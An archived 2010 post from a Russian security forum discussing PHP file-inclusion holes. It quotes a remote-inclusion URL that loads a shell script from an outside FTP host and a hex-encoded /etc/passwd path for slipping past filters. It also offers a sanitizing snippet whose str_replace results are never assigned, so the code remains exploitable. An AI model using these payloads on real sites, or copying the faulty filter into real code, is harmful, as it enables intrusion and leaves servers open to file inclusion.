Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

12.03.2010, 13:37

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Jokester

Угу, этот способ просто класс

file.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php

PS Я так полагаю в str_replace ты просто опечатался, как и в '\', а то вообще работать не будет.

почему? точка вырезается же, с ftp не проканает.

А "\" вырезается, чтобы не передать в хексе путь

\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 = /etc/passwd

Про опечатку - действительно два слеша надо, т.к. экранирование.

PHP код:


		
			
<? 

if ($page=="") { 

$page="any.php"; 

include($page); 

}else{ 

str_replace('.', '', $page); 

str_replace('/', '', $page); // прямые тоже  вырезать

str_replace('\\', '', $page); 

if(file_exists($page)){ 

include($page); 

} 

} 

?>